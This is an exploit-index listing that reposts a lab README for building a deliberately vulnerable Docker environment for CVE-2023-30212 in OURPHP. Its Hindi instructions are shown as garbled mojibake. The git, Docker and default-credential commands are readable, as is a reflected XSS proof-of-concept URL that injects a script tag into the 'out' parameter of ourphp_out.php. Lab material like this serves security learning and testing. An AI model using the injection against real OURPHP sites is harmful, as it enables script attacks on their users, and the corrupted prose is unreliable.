Sploitus

Exploit for Creating-a-Vulnerable-Docker-Environment-CVE-2023-30212-

kitploit ┬╖ 2026-09-02

Exploit Code

MARKDOWN30 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-JASALURAH-CREATING-A-VULNERABLE-DOCKER-ENVIRONMENT-CVE-2023-30212-
# рдЕрд╕реБрд░рдХреНрд╖рд┐рдд-рдбреЙрдХрд░-рд╡рд╛рддрд╛рд╡рд░рдг-рдмрдирд╛рдирд╛-CVE-2023-30212-

# рдореЗрд░реЗ рд░рд┐рдкреЙрдЬрд┐рдЯрд░реА рд╕реЗ рдлрд╝рд╛рдЗрд▓реЗрдВ рдбрд╛рдЙрдирд▓реЛрдб рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП git clone рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░реЗрдВ

git clone https://github.com/JasaluRah/Creating-a-Vulnerable-Docker-Environment-CVE-2023-30212-.git

рдЕрдм рдбреЙрдХрд░ рдЗрдореЗрдЬ рд╕реЗрдЯ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП

# рдбреЙрдХрд░ рдЗрдореЗрдЬ рдмрдирд╛рдирд╛

рдХрдорд╛рдВрдб рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░реЗрдВ `sudo docker build -t work .`

# рдбреЙрдХрд░ рдХрдВрдЯреЗрдирд░ рдЪрд▓рд╛рдиреЗ рдХреЗ рд▓рд┐рдП

рдХрдорд╛рдВрдб рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░реЗрдВ `sudo docker run -d -p 80:80 work`

рдЕрдм рд╣рдореЗрдВ рдХрдВрдЯреЗрдирд░ рдЖрдИрдбреА рдорд┐рд▓реЗрдЧреА

# OURPHP рджреЗрдЦрдиреЗ рдХреЗ рд▓рд┐рдП

рдмреНрд░рд╛рдЙрдЬрд╝рд░ рдореЗрдВ рдЬрд╛рдПрдВ рдФрд░ localhost ; `127.0.0.1` рдЦреЛрдЬреЗрдВ рдЕрдм рдХреНрд░реЗрдбреЗрдВрд╢рд┐рдпрд▓ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░реЗрдВ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдирд╛рдо : root рдкрд╛рд╕рд╡рд░реНрдб : docker рдбреЗрдЯрд╛рдмреЗрд╕ : work

# рд╡реНрдпрд╡рд╕реНрдерд╛рдкрдХ рдХреЗ рд░реВрдк рдореЗрдВ рд╕рд╛рдЗрди рдЗрди рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП

рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдирд╛рдо : work рдкрд╛рд╕рд╡рд░реНрдб : work

# рднреЗрджреНрдпрддрд╛ рдХреА рдЬрд╛рдБрдЪ рдХрд░рдирд╛

рдЗрд╕ url рдкрд░ рдЬрд╛рдПрдВ `http://localhost/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert("xss")</script>` рд╣рдореЗрдВ "xss" рдХреЗ рд░реВрдк рдореЗрдВ рдЕрд▓рд░реНрдЯ рд╕рдВрджреЗрд╢ рдорд┐рд▓реЗрдЧрд╛ред